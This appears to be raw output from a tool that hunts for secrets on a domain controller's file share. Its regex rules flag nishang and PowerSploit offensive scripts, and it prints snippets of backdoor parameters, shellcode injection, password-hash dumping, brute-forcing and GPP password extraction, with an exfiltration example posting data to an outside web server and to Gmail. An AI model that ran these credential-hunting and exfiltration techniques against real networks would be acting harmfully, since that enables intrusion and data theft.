\ \[Parameter\(Position\ =\ 2,\ Mandatory\ =\ \$True\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Domain,\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 3,\ Mandatory\ =\ \$False\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$Ser [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|18.2kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\DNS_TXT_Pwnage.ps1) Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 12,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 13,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 14,\ Mandatory\ =\ \$False [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:01Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|13.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Backdoors\HTTP-Backdoor.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 8,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 9,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 10,\ Mandatory\ =\ \$False, [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.5kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Execution\Execute-DNSTXT-Code.ps1) \ \n\ \ \ \ \[DllImport\("msvcrt\.dll"\)]\ \n\ \ \ \ public\ static\ extern\ IntPtr\ memset\(IntPtr\ dest,\ uint\ src,\ uint\ count\);\ \n'@\ \n\ \ \ \ \$winFunc\ =\ Add-Type\ -memberDefinition\ \$code\ -Name\ "Win32"\ -namespace\ Win32Functions\ -passthru\ \n\ \ \ \ \$size\ =\ 0x1000\ \n\ \ \ \ if\ \(\$sc\.Length\ -gt\ 0x1000\)\ \{\$size\ =\ \$sc\.Length}\ \n\ \ \ \ \$x=\$winFunc::VirtualAlloc\(0,0x1000,\$size,0x40\)\ \n\ \ \ \ for\ \(\$i=0;\$i\ -le\ \(\$sc\.Length-1\);\$i\+\+\)\ \{\$winFunc::memset\(\[In [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Green}<KeepNameContainsGreen|R|secret|8.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Get-LSASecret.ps1) Get-LSASecret.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Execution\Execute-Command-MSSQL.ps1) word\ for\ the\ account\.\n\n\.PARAMETER\ WindowsAuthentication\nUse\ this\ switch\ parameter\ to\ use\ Windows\ Authentication\ for\ SQL\ Server\.\n\n\.EXAMPLE\nPS>\ Execute-Command-MSSQL\ -ComputerName\ sqlserv01\ -UserName\ sa\ -Password\ sa1234\n\n\.EXAMPLE\nPS>\ Execute-Command-MSSQL\ -ComputerName\ 192\.168\.1\.10\ -UserName\ sa\ -Password\ sa1234\n\n\.EXAMPLE\nPS>\ Execute-Command-MSSQL\ -ComputerName\ target\ -UserName\ sa\ -Password\ sa1234\nCo [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Green}<KeepNameContainsGreen|R|credential|825B|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Get-WebCredentials.ps1) Get-WebCredentials.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Green}<KeepNameContainsGreen|R|credential|1.6kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Invoke-CredentialsPhish.ps1) Invoke-CredentialsPhish.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.8kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Get-PassHashes.ps1) ,\ \$k6,\ \$k7\)\n\n\ \ \ \ 0\.\.7\ \|\ %\{\n\ \ \ \ \ \ \ \ \$key\[\$_]\ =\ \$odd_parity\[\(\$key\[\$_]\ \*\ 2\)]\n\ \ \ \ }\n\n\ \ \ \ return\ ,\$key\n}\n\nfunction\ NewRC4\(\[byte\[]]\$key\)\n\{\n\ \ \ \ return\ new-object\ Object\ \|\n\ \ \ \ Add-Member\ NoteProperty\ key\ \$key\ -PassThru\ \|\n\ \ \ \ Add-Member\ NoteProperty\ S\ \$null\ -PassThru\ \|\n\ \ \ \ Add-Member\ ScriptMethod\ init\ \{\n\ \ \ \ \ \ \ \ if\ \(-not\ \$this\.S\)\n\ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \[byte\[]]\$this\.S\ =\ 0\.\.255;\n\ \ \ \ \ \ \ \ \ \ \ \ 0\.\.255\ \|\ %\ -begin\{ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|41kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Invoke-SessionGopher.ps1) essionObject\.Password\ =\ \(DecryptWinSCPPassword\ \$WinSCPSessionObject\.Hostname\ \$WinSCPSessionObject\.Username\ \$WinSCPSessionObject\.Password\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\ else\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$WinSCPSessionObject\.Password\ =\ "Saved\ in\ session,\ but\ master\ password\ prevents\ plaintext\ recovery"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \[void]\$ArrayOfWinSCPSessions\.Add\(\$WinSCPSessionObject\)\n\ \ \ \ \ \ \n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|41kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Invoke-SessionGopher.ps1) essionObject\.Password\ =\ \(DecryptWinSCPPassword\ \$WinSCPSessionObject\.Hostname\ \$WinSCPSessionObject\.Username\ \$WinSCPSessionObject\.Password\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\ else\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$WinSCPSessionObject\.Password\ =\ "Saved\ in\ session,\ but\ master\ password\ prevents\ plaintext\ recovery"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \[void]\$ArrayOfWinSCPSessions\.Add\(\$WinSCPSessionObject\)\n\ \ \ \ \ \ \n\ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|6.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Execution\Execute-Command-MSSQL.ps1) \n\ \ \ \ \ \ \ \ \[switch]\n\ \ \ \ \ \ \ \ \$WindowsAuthentication\n\ \ \ \ \)\n\ \ \n\ \ \ \ Try\{\n\ \ \ \ function\ Make-Connection\ \(\$query\)\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$Connection\ =\ New-Object\ System\.Data\.SQLClient\.SQLConnection\n\ \ \ \ \ \ \ \ \$Connection\.ConnectionString\ =\ "Data\ Source=\$ComputerName;Initial\ Catalog=Master;User\ Id=\$userName;Password=\$password;"\n\ \ \ \ \ \ \ \ if\ \(\$WindowsAuthentication\ -eq\ \$True\)\n\ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \$Connection\.ConnectionSt [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|14kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Keylogger.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPsCredentials|R|-SecureString|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$webClient\ =\ New-Object\ Net\.WebClient\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$securePassword\ =\ ConvertTo-SecureString\ -AsPlainText\ -String\ \$password\ -Force\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$credential\ =\ New-Object\ -TypeName\ System\.Management\.Automation\.PSCredential\ -ArgumentList\ \$userName,\ \$securePassword\n\ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|14kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Keylogger.ps1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPsCredentials|R|-SecureString|10.1kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Pivot\Invoke-NetworkRelay.ps1) =\ \$False,\ ParameterSetName="Show"\)]\n\ \ \ \ \ \ \ \ \[Switch]\n\ \ \ \ \ \ \ \ \$Show\n\n\ \ \ \ \)\n\n\n\ \ \ \ \#Check\ if\ Username\ and\ Password\ are\ provided\n\ \ \ \ if\ \(\$UserName\ -and\ \$Password\)\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$SecurePassword\ =\ ConvertTo-SecureString\ \$Password\ -AsPlainText\ -Force\n\t\ \ \ \ \$Creds\ =\ New-Object\ System\.Management\.Automation\.PSCredential\ \(\$UserName,\ \$SecurePassword\)\n\ \ \ \ }\n\ \ \ \ else\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$Creds\ =\ \$False\n\ \ \ \ }\n\ \ \ \ \n\ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPsCredentials|R|-SecureString|12.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Scan\Invoke-BruteForce.ps1) \ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$webClient\ =\ New-Object\ Net\.WebClient\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$securePassword\ =\ ConvertTo-SecureString\ -AsPlainText\ -String\ \$password\ -Force\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$credential\ =\ New-Object\ -TypeName\ System\.Management\.Automation\.PSCredential\ -ArgumentList\ \$userName,\ \$securePassword\n\ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|666kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Gather\Invoke-MimikatzWDigestDowngrade.ps1) LastError\ =\ true\)]\n\ \ \ \ \ \ \ \ public\ static\ extern\ bool\ LockWorkStation\(\);\n"@\n\ \ \ \ \ \n\ \ \ \ \ \ \ \ \$LockWorkStation\ =\ Add-Type\ -memberDefinition\ \$signature\ -name\ "Win32LockWorkStation"\ -namespace\ Win32Functions\ -passthru\n\ \ \ \ \ \ \ \ \$LockWorkStation::LockWorkStation\(\)\ \|\ Out-Null\n\ \ \ \ \ \ \ \ }\ \n\ \ \ \ \ \ \ \ Write-Verbose\ "Locking\ the\ target\ machine\."\n\ \ \ \ \ \ \ \ Lock-WorkStation\n\n\ \ \ \ }\n}\n\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|12.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Scan\Invoke-BruteForce.ps1) te-force\ attempts,\ defaults\ to\ 0\.\n\n\.PARAMETER\ Jitter\nJitter\ for\ the\ brute-force\ attempt\ delay,\ defaults\ to\ \+/-\ 0\.3\ \n\n\.EXAMPLE\nPS\ >\ Invoke-BruteForce\ -ComputerName\ SQLServ01\ -UserList\ C:\\test\\users\.txt\ -PasswordList\ C:\\test\\wordlist\.txt\ -Service\ SQL\ -Verbose\nBrute\ force\ a\ SQL\ Server\ SQLServ01\ for\ users\ listed\ in\ users\.txt\ and\ passwords\ in\ wordlist\.txt\n\n\.EXAMPLE\nPS\ >\ Invoke-BruteForce\ -ComputerName\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.1kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Pivot\Invoke-NetworkRelay.ps1) 141\.\ \n\n\.EXAMPLE\nPS\ >\ Invoke-NetworkRelay\ -Relay\ v6tov6\ -ListenAddress\ ::\ -Listenport\ 8888\ -ConnectAddress\ fe80::19ed:c169:128c:b68d\ \ -ConnectPort\ 445\ -ComputerName\ domainpc\ -Username\ bharat\\domainuser\ -Password\ Password1234\nAdd\ a\ network\ relay\ which\ listens\ on\ IPv6\ and\ connects\ to\ IPv6\ and\ forwards\ port\ 445\ from\ fe80::19ed:c169:128c:b68d\ to\ port\ 8888\ of\ domainpc\ \n\n\.EXAMPLE\nPS\ >\ Invoke-NetworkRelay [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$username\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 5,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$password\ =\ "null",\n\n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 6,\ Mandatory\ =\ \$False,\ Parametersetname="exfil"\)]\n\ \ \ \ \ \ \ \ \[String]\n\ \ \ \ \ \ \ \ \$URL\ =\ "null",\n\ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \[Parameter\(Position\ =\ 7,\ Mandatory\ =\ \$False,\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|12.7kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Scan\Invoke-BruteForce.ps1) \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ :UsernameLoop\ foreach\ \(\$username\ in\ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Connection\.ConnectionString\ =\ "Data\ Source=\$ComputerName;Initial\ Catalog=Master;User\ Id=\$userName;Password=\$password;"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "Checking\ \$userName\ :\ \$password"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Utility\Do-Exfiltration.ps1) sing\ it\ may\ increase\ chances\ of\ detection\.\nUsually,\ you\ should\ let\ the\ Name\ Server\ of\ target\ to\ resolve\ things\ for\ you\.\n\n\.EXAMPLE\nPS\ >\ Get-Information\ \|\ Do-Exfiltration\ -ExfilOption\ gmail\ -username\ <>\ -Password\ <>\n\nUse\ above\ command\ for\ data\ exfiltration\ to\ gmail\n\n\.EXAMPLE\nPS\ >\ Do-Exfiltration\ -Data\ \(Get-Process\)\ -ExfilOption\ Webserver\ -URL\ http://192\.168\.254\.183/catchpost\.php\n\nUse\ above\ command\ f [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Yellow}<KeepDbConnStringPw|R|connectionstring.{1,200}passw|285.3kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\powerpreter\Powerpreter.psm1) \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ :UsernameLoop\ foreach\ \(\$username\ in\ \$usernames\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ foreach\ \(\$Password\ in\ \$Passwords\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Connection\.ConnectionString\ =\ "Data\ Source=\$ComputerName;Initial\ Catalog=Master;User\ Id=\$userName;Password=\$password;"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Verbose\ "Checking\ \$userName\ :\ \$password"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|9.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Shells\Invoke-PoshRatHttps.ps1) Hnlf0heygfIFNRRrvzHzwCf/jBm/4ZnfEE27PBNb358ETy7HvtW7gL7clNJx0iATUz6QH3aWdRiTx9op8jAdOTyY99AK8vek\+YyOsPLL1jA7MB8wBwYFKw4DAhoEFMQTv4RORuVi4juttRObhcARChafBBTpLslMGebrDYuP89Peo8HGC7sEKgICB9A='\n\n\ \ \ \ \$CertPassword\ =\ 'password'\n\ \ \ \ \$CertPinThumbprint\ =\ \(New-Object\ System\.Security\.Cryptography\.X509Certificates\.X509Certificate2\(\[System\.Convert]::FromBase64String\(\$Base64Cert\),\ \$CertPassword\)\)\.Thumbprint\n\n\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|9.4kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Shells\Invoke-PoshRatHttps.ps1) Hnlf0heygfIFNRRrvzHzwCf/jBm/4ZnfEE27PBNb358ETy7HvtW7gL7clNJx0iATUz6QH3aWdRiTx9op8jAdOTyY99AK8vek\+YyOsPLL1jA7MB8wBwYFKw4DAhoEFMQTv4RORuVi4juttRObhcARChafBBTpLslMGebrDYuP89Peo8HGC7sEKgICB9A='\n\n\ \ \ \ \$CertPassword\ =\ 'password'\n\ \ \ \ \$CertPinThumbprint\ =\ \(New-Object\ System\.Security\.Cryptography\.X509Certificates\.X509Certificate2\(\[System\.Convert]::FromBase64String\(\$Base64Cert\),\ \$CertPassword\)\)\.Thumbprint\n\n\n [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:02Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.8kB|2025-05-01 16:08:28Z>(\\DC01.inlanefreight.local\IT\Tools\nishang-master\Shells\Invoke-PsGcat.ps1) R\ NonInteractive\nUse\ the\ non-interactive\ mode\.\ Execute\ the\ provided\ command\ or\ payload\ and\ exit\.\n\n\.PARAMETER\ GetOutput\nRetrieve\ last\ ouput\ from\ Gmail\.\n\n\.EXAMPLE\nPS\ >\ Invoke-PSGcat\ -Username\ psgcatlite\ -password\ pspassword\nUse\ GetOutput\ to\ get\ output\.\nUse\ Script\ to\ specify\ a\ script\.\nPsGcat:\ Get-Process\nCommand\ sent\ to\ psgcatlite@gmail\.com\n\n\nAbove\ shows\ an\ example\ where\ Get-Process\ is\ sent\ to\ Gmail\. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Green}<KeepNameContainsGreen|R|passw|13.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPPassword.ps1) Get-GPPPassword.ps1 [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|4.6kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPAutologon.ps1) e-Verbose\ "Potential\ password\ in\ \$File"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#put\ \[BLANK]\ in\ variables\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Password\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$UserName\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#Create\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepPassOrKeyInCode|R|passw?o?r?d\s*=\s*[\'\"][^\'\"]....|4.6kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPAutologon.ps1) e-Verbose\ "Potential\ password\ in\ \$File"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#put\ \[BLANK]\ in\ variables\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$Password\)\)\ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$Password\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\(\$UserName\)\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$UserName\ =\ '\[BLANK]'\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#Create\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:03Z [File] {Red}<KeepCmdCredentials|R|passwo?r?d\s*=\s*[\'\"][^\'\"]....|13.4kB|2025-05-01 16:08:44Z>(\\DC01.inlanefreight.local\IT\Tools\PowerSploit-master\Exfiltration\Get-GPPPassword.ps1) \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ 